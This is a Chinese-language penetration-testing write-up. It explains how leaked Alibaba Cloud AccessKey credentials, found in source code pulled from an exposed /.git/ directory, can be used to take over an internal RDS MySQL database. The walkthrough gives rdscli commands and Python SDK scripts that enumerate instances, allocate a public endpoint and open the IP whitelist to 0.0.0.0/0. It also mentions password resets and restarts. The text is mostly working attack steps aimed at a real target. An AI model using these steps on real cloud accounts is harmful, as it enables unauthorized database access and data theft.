在配合某省的WA前期滲透偵查CX中,通過/.git/獲取到網站源碼,查看配置文件發現該系統使用OSS進行文件存儲,配置如下:
ACCESSKEYID=XXXXX ACCESSKEYSECRET=XXXXX ENDPOINT=oss-cn-beijing.aliyuncs.com
DB_HOST=rm-xxxxx.mysql.rds.aliyuncs.com
DB_PORT=3306
DB_USER=xxxx
DB_PASSWORD=xxxxx
之前了解過,通過KEYID(非子賬戶),可以獲取到阿里雲的服務器權限,例如一些運維平台支持類似這種使用。
但是這些服務器的密碼並不知道,及時知道,大部分服務器VPC對外僅開了80,443,而且異地登錄會發送告警,這樣的方法不可取。
獲取到MYSQL,但是通過ping,可以看到實際上是一個內網IP,其實服務器是在一個VPC里,也就是數據庫只允許內網來鏈接,這樣我們怎么辦呢,可能都束手無策了吧。
主要需要分析數據,但是RDS並不允許連接。查詢阿里雲相關文件,發現RDS其實也可以使用ACCESSKEY來進行操作的。
通過阿里雲官網,可以下載工具Rdscli https://market.aliyun.com/products/53690006/cmgj000311.html#sku=mianfeiban
查看相關文檔,配置就不再次啰嗦了,文檔里面都包含:
通過key查看賬戶下RDS相關實例:
rds DescribeDBInstances --PageSize 50
返回如下:
[root@localhost Rdscli]# rds DescribeDBInstances --PageSize 50 -------------------------------------------------------------- | DescribeDBInstances | +-------------------+----------------------------------------+ | PageNumber | 1 | | PageRecordCount | 6 | | RequestId | XXXXXXXX-XXXX-4A0B-97C1-C5XXXXXXXXXX | | TotalRecordCount | 6 | +-------------------+----------------------------------------+ || Items || |+----------------------------------------------------------+| ||| DBInstance ||| ||+-------------------------+------------------------------+|| ||| ConnectionMode | Standard ||| ||| CreateTime | 2020-08-14T12:46:23Z ||| ||| DBInstanceClass | rds.mysql.s3.large ||| ||| DBInstanceDescription | rr-XXXXXXXXXXXXXXXXX ||| ||| DBInstanceId | rr-XXXXXXXXXXXXXXXXX ||| ||| DBInstanceNetType | Intranet ||| ||| DBInstanceStatus | Running ||| ||| DBInstanceStorageType | ||| ||| DBInstanceType | Readonly ||| ||| Engine | MySQL ||| ||| EngineVersion | 8.0 ||| ||| ExpireTime | 2020-10-14T16:00:00Z ||| ||| InsId | 1 ||| ||| InstanceNetworkType | VPC ||| ||| LockMode | Unlock ||| ||| LockReason | ||| ||| MasterInstanceId | rm-XXXXXXXXXXXXXXXXX ||| ||| MutriORsignle | False ||| ||| PayType | Prepaid ||| ||| RegionId | cn-beijing ||| ||| ResourceGroupId | rg-XXXXXXXXXXXXXXX ||| ||| VSwitchId | vsw-XXXXXXXXXXXXXXXXXXXXX ||| ||| VpcCloudInstanceId | rr-XXXXXXXXXXXXXXXXX ||| ||| VpcId | vpc-XXXXXXXXXXXXXXXXXXXXX ||| ||| ZoneId | cn-beijing-h ||| ||+-------------------------+------------------------------+||
通過工具獲取實例ID,查看某個實例信息:
rds ExportDBInstance --DBInstanceId rr-XXXXXXX --filename test
返回實例詳細信息:
{ "Items": { "DBInstanceAttribute": [ { "Category": "HighAvailability", "SupportUpgradeAccountType": "No", "InsId": 1, "LockMode": "Unlock", "ConnectionString": "rr-xxxxxxxxxx.mysql.rds.aliyuncs.com", "MasterInstanceId": "rm-xxxxxxxxxxxx", "DBInstanceStorageType": "local_ssd", "DBInstanceNetType": "Intranet", "ReadDelayTime": "0", "ReadOnlyDBInstanceIds": { "ReadOnlyDBInstanceId": [] }, "SupportCreateSuperAccount": "No", "MaxConnections": 2000, "DBInstanceClassType": "x", "Engine": "MySQL", "AvailabilityValue": "100.0%", "CanTempUpgrade": true, "VpcId": "vpc-xxxxxxxxxxx", "IPType": "IPv4", "DBMaxQuantity": 99999, "ConnectionMode": "Standard", "RegionId": "cn-beijing", "SlaveZones": { "SlaveZone": [] }, "ResourceGroupId": "rg-xxxx", "VSwitchId": "vsw-xxxxxx", "InstanceNetworkType": "VPC", "ExpireTime": "2020-10-14T16:00:00Z", "ConsoleVersion": "", "DBInstanceType": "Readonly", "DBInstanceStatus": "Running", "ProxyType": 0, "DispenseMode": "ClassicDispenseMode", "CreationTime": "2020-08-14T12:46:23Z", "SecurityIPMode": "normal", "SuperPermissionMode": "", "AutoUpgradeMinorVersion": "Auto", "EngineVersion": "8.0", "CurrentKernelVersion": "rds_20200630", "DBInstanceDiskUsed": 67697115136, "IncrementSourceDBInstanceId": "rm-xxxxxxx", "VpcCloudInstanceId": "rr-xxxxxxx", "DBInstanceMemory": 8192, "MaxIOPS": 5000, "DedicatedHostGroupId": "", "DBInstanceStorage": 100, "DBInstanceDescription": "rr-xxxxxxx", "Extra": { "DBInstanceIds": { "DBInstanceId": [] } }, "LatestKernelVersion": "rds_20200630", "DBInstanceId": "rr-xxxxxxxxxxxx", "PayType": "Prepaid", "AccountMaxQuantity": 99999, "OriginConfiguration": "", "MaintainTime": "18:00Z-22:00Z", "DBInstanceCPU": "4", "AccountType": "Mix", "DBInstanceClass": "rds.mysql.s3.large", "SecurityIPList": "", "Port": "3306", "ZoneId": "cn-beijing-h" } ] }, "RequestId": "A1A4E351-1778-xxxx-9D57-xxxxxxx"
然后我自己在阿里雲注冊了一個看看RDS平台提供的功能:
注冊發現,實際上RDS分為內網域名和外網域名的,默認是不開外網地址的,需要自己去申請,查看的RDS ConnectionString 很明顯是一個內網的地址。
查詢官方API,發現有支持此功能的API:
調用AllocateInstancePublicConnection接口申請實例的外網地址
https://help.aliyun.com/document_detail/26234.html?spm=a2c4g.11186623.6.1655.6eb83c34jOC0ON
申請外網地址代碼如下:
#!/usr/bin/env python #coding=utf-8 from aliyunsdkcore.client import AcsClient from aliyunsdkcore.acs_exception.exceptions import ClientException from aliyunsdkcore.acs_exception.exceptions import ServerException from aliyunsdkrds.request.v20140815.AllocateInstancePublicConnectionRequest import AllocateInstancePublicConnectionRequest client = AcsClient('<accessKeyId>', '<accessSecret>', 'cn-beijing') request = AllocateInstancePublicConnectionRequest() request.set_accept_format('json') request.set_DBInstanceId("DBInstanceId") request.set_ConnectionStringPrefix("public_domain") request.set_Port("3306") response = client.do_action_with_exception(request) # python2: print(response) print(str(response, encoding='utf-8'))
開通完外網域名之后,我們再去查詢一下RDS實例域名地址:
調用DescribeDBInstanceNetInfo接口查詢實例的所有連接地址信息:
#!/usr/bin/env python #coding=utf-8 from aliyunsdkcore.client import AcsClient from aliyunsdkcore.acs_exception.exceptions import ClientException from aliyunsdkcore.acs_exception.exceptions import ServerException from aliyunsdkrds.request.v20140815.DescribeDBInstanceNetInfoRequest import DescribeDBInstanceNetInfoRequest client = AcsClient('<accessKeyId>', '<accessSecret>', 'cn-hangzhou') request = DescribeDBInstanceNetInfoRequest() request.set_accept_format('json') request.set_DBInstanceId("DBInstanceId") response = client.do_action_with_exception(request) # python2: print(response) print(str(response, encoding='utf-8'))
返回如下:
{ "RequestId": "xxxx-xx-xx-xx-xxxxxxx", "DBInstanceNetInfos": { "DBInstanceNetInfo": [ { "IPType": "Private", "VPCId": "vpc-xxxxxxxxx", "Port": "3306", "VSwitchId": "vsw-xxxxxx", "Upgradeable": "Disabled", "ConnectionString": "rm-xxxxxx.mysql.rds.aliyuncs.com", "IPAddress": "172.xx.xxx.xxx", "SecurityIPGroups": { "securityIPGroup": [] }, "DBInstanceWeights": { "DBInstanceWeight": [] }, "ConnectionStringType": "Normal" }, { "IPType": "Public", "VPCId": "", "Port": "3306", "VSwitchId": "", "Upgradeable": "Disabled", "ConnectionString": "rm-xxxxxxxxxxx.mysql.rds.aliyuncs.com", "IPAddress": "xxx.xxx.xxx.xxx", "SecurityIPGroups": { "securityIPGroup": [] }, "DBInstanceWeights": { "DBInstanceWeight": [] }, "ConnectionStringType": "Normal" } ] }, "SecurityIPMode": "normal", "InstanceNetworkType": "VPC" }
這樣就獲取到這個RDS外網地址了,獲取外網地址,發現端口不通。
測試發現我自己的也不通,看來是網絡的問題了,查一下文檔:
解決RDS外網無法訪問:https://help.aliyun.com/knowledge_detail/96028.html#2
1、確認訪問RDS實例的IP地址已添加到RDS白名單。如果未添加,請參見設置白名單,進行設置。
2、檢查ECS實例的安全組。
登錄雲服務器管理控制台。
找到該實例,單擊管理進入實例詳情頁面,在左側導航欄,單擊本實例安全組。在內網出方向安全全部規則中確認不存在對RDS實例的限制策略。
請檢查是否開啟了高安全白名單模式,具體請參見高安全白名單模式。如果已開啟,需確保設備公網IP地址已添加到經典網絡的分組。
注意:專有網絡的分組不適用於公網。
3、查看RDS實例的狀態,檢查是否存在因為磁盤空間超出購買規格限制而被鎖定。在實例鎖定期間,應用無法對RDS數據庫進行讀寫操作,詳情請參見如何排查MySQL實例空間滿后自動鎖定的原因。
4、通過查看RDS實例的性能監控。
其他性能問題請參見解決CPU、內存、空間、IOPS使用率偏高的問題。
如是業務正常增長,建議您對實例進行配置升級。
說明:升配過程中可能會有一次30s左右的閃斷,建議用戶做好連接重連機制,保證用戶業務的正常運行,具體信息請參考RDS使用須知。
5、確認白名單中添加的設備公網IP地址為設備真正的出口IP地址。IP地址填寫錯誤的原因如下:
設備的公網IP地址不固定,可能會變動。
IP地址查詢工具或網站查詢的公網IP地址不准確。關於確認設備公網IP地址的方法,請參見定位本地IP。
6、確認使用的連接地址為RDS的外網地址。
看了下我自己的:
RDS默認是127.0.0.1,拒絕所有的,所以我們需要設置一下,允許我們來鏈接,這樣就不會因為火牆就不會導致端口不通了。
可以先查一下IP白名單:
調用DescribeDBInstanceIPArrayList接口查詢RDS實例IP白名單。
https://help.aliyun.com/document_detail/26241.html?spm=a2c4g.11186623.6.1715.34013a167E3PKs
調用DescribeDBInstanceAttribute接口查詢RDS實例的詳細信息。
https://help.aliyun.com/document_detail/26231.html?spm=5176.10695662.1996646101.searchclickresult.5afd39f8vo1M3l
# 查詢IP白名單 request = DescribeDBInstanceIPArrayListRequest() request.set_accept_format('json') request.set_DBInstanceId("rm-2ze8wbh1ci8i24zgq") response = client.do_action_with_exception(request)
然后我們再添加一下IP白名單:
調用ModifySecurityIps接口修改RDS實例IP白名單。
https://help.aliyun.com/document_detail/26242.html?spm=a2c4g.11186623.6.1717.14755667CITNGy
from aliyunsdkrds.request.v20140815.ModifySecurityIpsRequest import ModifySecurityIpsRequest client = AcsClient('xxxxx', 'xxxxxxx', 'cn-beijing') # 修改IP白名單 request = ModifySecurityIpsRequest() request.set_accept_format('json') request.set_DBInstanceId("rm-xxxxxxx") request.set_SecurityIps("0.0.0.0/0") response = client.do_action_with_exception(request) # python2: print(response) print(str(response))
設置0.0.0.0/0所有對外就都可以鏈接了。
這樣,我們就獲得了RDS的外網域名,RDS外網訪問權限。
剛才說的工具命令也提供了部分功能:
[root@localhost Rdscli]# rds help usage: rds <operation> [options and parameters] [rds] valid operations as follows: CancelImport | CreateAccount CreateBackup | CreateDBInstance CreateDBInstanceForChannel | CreateDBInstanceforFirstPay CreateDatabase | CreatePostpaidDBInstance CreateTempDBInstance | CreateUploadPathForSQLServer DeleteAccount | DeleteDBInstance DeleteDatabase | DescribeAccounts DescribeBackupPolicy | DescribeBackups DescribeBinlogFiles | DescribeDBInstanceAttribute DescribeDBInstancePerformance | DescribeDBInstances DescribeDatabases | DescribeErrorLogs DescribeFilesForSQLServer | DescribeImportsForSQLServer DescribeOptimizeAdviceByDBA | DescribeOptimizeAdviceOnBigTable DescribeOptimizeAdviceOnExcessIndex | DescribeOptimizeAdviceOnMissIndex DescribeOptimizeAdviceOnMissPK | DescribeOptimizeAdviceOnStorage DescribeParameterTemplates | DescribeParameters DescribeRegions | DescribeResourceUsage DescribeSQLLogRecords | DescribeSQLLogReports DescribeSlowLogRecords | DescribeSlowLogs ExportDBInstance | GrantAccountPrivilege ImportDBInstance | ImportDataForSQLServer ImportDatabaseBetweenInstances | ModifyAccountDescription ModifyBackupPolicy | ModifyDBDescription ModifyDBInstanceDescription | ModifyDBInstanceMaintainTime ModifyDBInstanceSpec | ModifyParameter ModifyPostpaidDBInstanceSpec | ModifySecurityIps PurgeDBInstanceLog | ResetAccountPassword RestartDBInstance | RevokeAccountPrivilege SwitchDBInstanceNetType | UpgradeDBInstanceEngineVersion
例如:
rds ExportDBInstance --DBInstanceId rr-xxxxx --ModifySecurityIps 0.0.0.0/0
和Python腳本一樣,即可外網鏈接。
同樣,我們也可以開通一個安全組、修改RDS密碼,重啟RDS等等操作。
RDS API
https://help.aliyun.com/document_detail/182821.html?spm=a2c4g.11186623.2.10.4b1b2eb15RxpE2#doc-8073